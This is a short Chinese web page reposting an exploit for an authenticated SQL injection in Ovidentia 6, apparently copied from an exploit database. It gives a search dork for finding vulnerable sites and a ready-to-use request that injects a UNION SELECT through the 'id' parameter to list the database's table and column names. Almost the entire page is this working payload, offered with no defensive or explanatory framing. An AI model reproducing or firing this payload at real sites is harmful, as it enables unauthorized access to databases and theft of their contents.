# Ovidentia 6 SQL注入漏洞
==EXP==
# Exploit Title: Ovidentia 6 - 'id' SQL injection (Authenticated) # Exploit Author: Felipe Prates Donato (m4ud) # Vendor Homepage: http://www.ovidentia.org # Version: 6 # DORK : "Powered by Ovidentia" http://Site/ovidentia/index.php?tg=delegat&idx=mem&id=1 UNION Select (select group_concat(TABLE_NAME,":",COLUMN_NAME,"\r\n") from information_Schema.COLUMNS where TABLE_SCHEMA = 'mysql'),2--
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容